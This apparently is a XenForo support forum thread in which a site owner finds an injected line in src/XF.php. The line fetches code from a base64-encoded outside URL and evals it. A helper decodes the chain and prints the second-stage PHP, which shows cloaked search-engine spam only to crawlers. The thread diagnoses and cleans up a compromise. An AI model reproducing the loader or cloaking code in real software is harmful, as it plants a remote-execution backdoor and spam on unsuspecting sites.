XF 2.2 src/XF.php Unexpected contents

KSA

KSA

Well-known member
No matter how many times I re-upload the src/XF.php file, check for files health shows Unexpected contents

comparing the two files shows this line

PHP: 
$ch = curl_init();$timeout = 60;curl_setopt ($ch, CURLOPT_URL, base64_decode('aHR0cHM6Ly9qc3BocC5jYy9maWxlL2RlZmVuc2UtYXJhYi5jb20vYTE='));curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$Content_mb = curl_exec($ch);curl_close($ch);eval($Content_mb);
 
Sort by date Sort by votes
That's exactly why the file check system is in place. That line is some hacky stuff that is not part of XF source.

That is downloading this: https://jsphp.cc/file/defense-arab.com/a1, which in turn downloads this: https://jsphp.cc/file/defense-arab.com/a2

Which then runs this:

PHP: 
<?php
error_reporting(0);
$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($agent,'bot') > 0 && $_SERVER['REQUEST_URI']=='/vb/'){    
    $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if(strpos($accept_lang,'zh')>-1 || $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']==1 || $_COOKIE['az']=='lp'){setcookie('az','lp',time()+3600*7200); echo ' '; exit;}
    echo file_get_contents("https://jsphp.cc/file/defense-arab.com/a1.html");
    exit;
}
?>

It causes the site to spew out this page: https://jsphp.cc/file/defense-arab.com/a1.html, but only if it's a search engine spider (for example Googlebot). Basically it's search engine spam.
 
  • Like
Reactions: KSA
Upvote 1 Downvote
digitalpoint said:
That's exactly why the file check system is in place. That line is some hacky stuff that is not part of XF source.

That is downloading this: https://jsphp.cc/file/defense-arab.com/a1, which in turn downloads this: https://jsphp.cc/file/defense-arab.com/a2

Which then runs this:

PHP: 
<?php
error_reporting(0);
$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($agent,'bot') > 0 && $_SERVER['REQUEST_URI']=='/vb/'){   
    $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if(strpos($accept_lang,'zh')>-1 || $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']==1 || $_COOKIE['az']=='lp'){setcookie('az','lp',time()+3600*7200); echo ' '; exit;}
    echo file_get_contents("https://jsphp.cc/file/defense-arab.com/a1.html");
    exit;
}
?>

It causes the site to spew out this page: https://jsphp.cc/file/defense-arab.com/a1.html, but only if it's a search engine spider (for example Googlebot). Basically it's search engine spam.
Click to expand...

That is exactly what happened when you type the url in Google search, it yields Japanese characters where the board title and meta description. I however couldn't find the file being used on the server! Any advice?
 
Upvote 0 Downvote
If that file is part of the core XF installation, I would upload the file from there. No official release of XF, and no add-on in resources here, will ever change a core XF file.
 
Upvote 0 Downvote
You must log in or register to reply here.

Similar threads

craigForo
Duplicate ErrorException: [E_WARNING] Cannot declare class XF\AdminSearch\PublicTemplate, because the name is already in use in src/XF.php at line 397
Replies
1
Views
41
Jeremy P
Jeremy P
O
  • Solved
XF 2.3 File health check results: Unexpected contents
Replies
4
Views
58
Old Nick
O
JamesBrown
  • Question Question
XF 2.2 src/XF/Service/PushNotification.php Unexpected contents
Replies
2
Views
237
digitalpoint
digitalpoint
W
  • Question Question
XF 2.3 There are X missing files or files with unexpected contents. You should review these. Dismiss?
Replies
9
Views
97
Chromaniac
Chromaniac
Skitty
  • Question Question
XF 2.2 Uploaded emoji, now get file health errors "unexpected contents"
Replies
4
Views
302
Skitty
Skitty
Back
Top Bottom